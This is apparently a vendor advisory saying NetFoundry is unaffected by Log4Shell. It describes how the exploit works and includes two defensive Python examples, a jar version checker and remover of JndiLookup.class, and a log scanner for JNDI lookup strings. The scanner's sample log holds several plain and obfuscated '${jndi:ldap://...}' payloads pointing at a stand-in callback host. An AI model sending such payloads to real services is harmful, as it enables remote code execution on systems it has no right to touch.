NetFoundry software does not use Apache log4j. No NetFoundry product is vulnerable to exploitation of CVE-2021-44228. As log4j use is a prerequisite for CVE-2021-45046, no NetFoundry product is affected by that follow-on vulnerability either. In addition, NetFoundry's Secure by Design architecture helps mitigate the threat for systems that do use Apache log4j.
Details of the CVE-2021-44228 Vulnerability From NIST:
This CVE carries a CVSS severity of 10.0, the highest possible. Any application that logs attacker-influenced input (HTTP headers, form fields, user names and similar) and runs Apache log4j-core 2.0-beta9 through 2.14.1 is potentially at risk. NIST's description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to "true" or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

Note that the formatMsgNoLookups property was later shown to be an incomplete mitigation in some configurations (tracked as CVE-2021-45046, referenced above). The Apache Logging Services project's guidance is to upgrade to a release that removes message lookups entirely (2.16.0 or later for Java 8 and above, 2.12.2 or later for Java 7, 2.3.1 or later for Java 6) rather than rely on the property; where an upgrade is not yet possible, removing the JndiLookup class from the jar as shown above remains the recommended interim step.
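The version and JndiLookup-class checks from the NIST text, carried out programmatically, as an added example that is not NetFoundry or Apache code: the script reads the version from a jar's MANIFEST.MF, reports whether org/apache/logging/log4j/core/lookup/JndiLookup.class is present, and rewrites the jar without that entry, which is what the zip -q -d command above does. It treats 2.16.0+, 2.12.2+ and 2.3.1+ as fixed for CVE-2021-44228 and CVE-2021-45046. The three jars it inspects are constructed stand-ins built in a temporary directory (a manifest plus a placeholder class entry), not real log4j binaries.

```python
"""Inventory check for log4j-core jars: read the version from MANIFEST.MF,
report whether JndiLookup.class is present, and strip it the way the NVD
text's `zip -q -d` command does. Added example, not NetFoundry or Apache
code; the jars built by make_sample_jar are constructed stand-ins."""
import os
import re
import shutil
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' reduces to (2, 0, 0)."""
    nums = [int(x) for x in re.findall(r"\d+", text.split("-")[0])]
    return tuple((nums + [0, 0, 0])[:3])


def fixed_for_44228_45046(ver):
    """Releases that remove message lookups and so close both CVE-2021-44228 and
    CVE-2021-45046: 2.16.0+ (Java 8), 2.12.2+ (Java 7 branch), 2.3.1+ (Java 6 branch).
    2.15.0 is deliberately not treated as fixed: it only disabled lookups by default."""
    major, minor, patch = ver
    if major != 2:
        return major > 2
    if minor == 12:
        return patch >= 2
    if minor == 3:
        return patch >= 1
    return minor >= 16


def read_version(jar):
    """Version string from the jar manifest, or None if it cannot be read."""
    with zipfile.ZipFile(jar) as z:
        if "META-INF/MANIFEST.MF" not in z.namelist():
            return None
        manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for key in ("Log4jReleaseVersion", "Implementation-Version"):
        m = re.search(r"^%s:\s*(\S+)" % key, manifest, re.M)
        if m:
            return m.group(1)
    return None


def assess(jar):
    """'fixed', 'mitigated' (JndiLookup.class stripped from an old release),
    'vulnerable', or 'unknown' (class present, version unreadable). Fixed releases
    still ship JndiLookup.class (disabled, not deleted), so check the version first."""
    version = read_version(jar)
    with zipfile.ZipFile(jar) as z:
        has_lookup = JNDI_LOOKUP in z.namelist()
    if version and fixed_for_44228_45046(parse_version(version)):
        return "fixed"
    if not has_lookup:
        return "mitigated"
    return "vulnerable" if version else "unknown"


def strip_jndi_lookup(jar):
    """Rewrite the jar without JndiLookup.class (the `zip -q -d` step). Returns True if removed."""
    tmp = jar + ".tmp"
    removed = False
    with zipfile.ZipFile(jar) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    os.replace(tmp, jar)
    return removed


def make_sample_jar(path, version, include_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar: a manifest plus a placeholder class entry."""
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF",
                   "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        if include_lookup:
            z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return path


def demo():
    """Build sample jars, assess them, strip the vulnerable one and re-assess it."""
    d = tempfile.mkdtemp()
    try:
        vuln = make_sample_jar(os.path.join(d, "log4j-core-2.14.1.jar"), "2.14.1")
        fixed = make_sample_jar(os.path.join(d, "log4j-core-2.17.1.jar"), "2.17.1")
        java7 = make_sample_jar(os.path.join(d, "log4j-core-2.12.2.jar"), "2.12.2")
        before = assess(vuln)
        strip_jndi_lookup(vuln)
        return {"2.14.1": before, "2.14.1-stripped": assess(vuln),
                "2.17.1": assess(fixed), "2.12.2": assess(java7)}
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(name, status)
```

Point assess() at real jars found with something like find / -name 'log4j-core-*.jar' to inventory a host; a 'mitigated' result means the interim class removal has been applied but the upgrade is still outstanding.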
NetFoundry Mitigation of CVE-2021-44228
In the case of CVE-2021-44228, mitigation comes from the core NetFoundry Secure by Design controls: closed inbound firewall ports, least-privileged access based on strong identities, and outbound-only, authorized sessions to the private NetFoundry Fabric routers, permitted solely for the flows the solution needs. Like many exploits, the most effective use of the log4j vulnerability involves retrieving additional code and establishing command and control. The usual flow is that the attacker gets a specially crafted lookup string into a field the application logs; when log4j formats that message it performs the JNDI lookup, which makes an outbound LDAP (or RMI, DNS and so on) request to the attacker's server, and the JVM then loads and executes the code that server points it to. With the architecture described above, the logging host has no route to that attacker-controlled server, so the second stage fails even if the crafted string reaches the log. Two conditions have to hold for that to be true: the application must not be reachable by unauthenticated callers, and its host must not be permitted to open arbitrary outbound connections; a host that can reach arbitrary internet addresses on any port can complete the exploit regardless of its inbound rules. We describe this architecture in more detail below.
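What the "specially crafted log entry" looks like, and how to find attempts in logs that have already been written, as an added example that is not NetFoundry code: the script URL-decodes each line, reduces the lookup obfuscations attackers used against log4j (${lower:...}, ${upper:...}, the ${::-x} and ${env:NAME:-x} default-value forms, ${date:'x'}) to their literal values, and then flags any ${jndi:<scheme>:...} lookup together with the callback host it names. The access-log lines it runs over are constructed for this example; 203.0.113.9 is a documentation address, not a real server.

```python
"""Detect CVE-2021-44228 lookup strings in log lines after undoing common
obfuscation. Added example, not NetFoundry or Apache code. SAMPLE_LOG is
constructed; 203.0.113.9 is a documentation-range address."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further '${' or '}' inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A fully reduced JNDI lookup: ${jndi:<scheme>:[//host[:port]]...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://([^/\s}]+))?", re.I)


def _resolve(body):
    """Value a log4j 2.x lookup yields for the obfuscation forms seen in the wild.
    Returns None for lookups left alone (jndi itself, or anything unrecognised)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if low.startswith("date:"):          # ${date:'j'}: quoted text is emitted literally
        return body[5:].strip("'")
    if ":-" in body:                     # ${::-j}, ${env:NOPE:-j}: default value of any lookup
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_rounds=20):
    """URL-decode, then resolve lookups innermost-first until nothing changes.
    max_rounds bounds the work on adversarial input; the loop stops early once stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _resolve(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines):
    """One finding per JNDI lookup: line number, scheme, callback host, lookup text."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize(raw)
        for m in JNDI.finditer(normalized):
            findings.append({"line": number, "scheme": m.group(1).lower(),
                             "host": m.group(2), "lookup": m.group(0)})
    return findings


# Constructed access-log lines: one benign, four attack attempts of increasing
# obfuscation, and one benign use of a date lookup that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:13:02:14 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:13:02:15 +0000] "GET /login HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/b}"',
    '198.51.100.8 - - [10/Dec/2021:13:03:01 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D'
    '%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:13:04:40 +0000] "POST /api HTTP/1.1" 200 12 "-" '
    '"${${env:NOPE:-j}ndi:${upper:d}ns://203.0.113.9/d}"',
    '10.0.0.6 - - [10/Dec/2021:13:05:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The callback hosts the scanner extracts are exactly the destinations an egress allow-list has to deny for the second stage of the exploit to fail; matching only the literal string "${jndi:" misses three of the four attempts above, which is why the lookups are reduced first.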
NetFoundry's Secure by Design protection
Log4j is another example of how, in today's world, exploitation techniques travel faster than the patching and update procedures of users and companies around the world. Often, by the time the vendor or project behind a vulnerable software package produces a patch, some users are left to close the barn door and clean up the mess that attackers exploiting the software have already made. Reactive security alone is no longer good enough.
With NetFoundry's Secure by Design architecture, however, the barn door is always closed, proactively; in fact, most attackers can't even see the barn. Inbound firewall ports are closed and the application's IP address is never exposed, so an attacker has no route on which to deliver a crafted log string in the first place; this is very hard to achieve with a conventional architecture that must listen on an inbound port. This private, authenticate-before-connect architecture, enforced with strong identities and least-privileged access to Private Fabric Routers, minimizes the attack surface.
This approach proactively disrupts the tactics and techniques used by malicious actors, rather than reacting to attacks after the fact. In MITRE ATT&CK terms, the NetFoundry approach acts early, against the Reconnaissance and Initial Access tactics, by making the targeted applications unreachable from the network (Secure by Design). Disrupting those tactics is critical to proactively preventing breaches: zero-day vulnerabilities are, by definition, exploited before a patch exists, and certainly before organizations can apply one, so they require a Secure by Design approach. Rather than being stuck in a race against time, a Secure by Design organization has already mitigated the risk by ensuring the attack cannot reach the vulnerability to begin with. This significantly reduces the overall risk to the enterprise while it carries out its patching or upgrade procedures. Breaches are always possible, of course, so the NetFoundry solution is also designed to minimize and isolate the blast radius of a successful exploit within a network, for example by not allowing hostile software to 'call home' or spread laterally.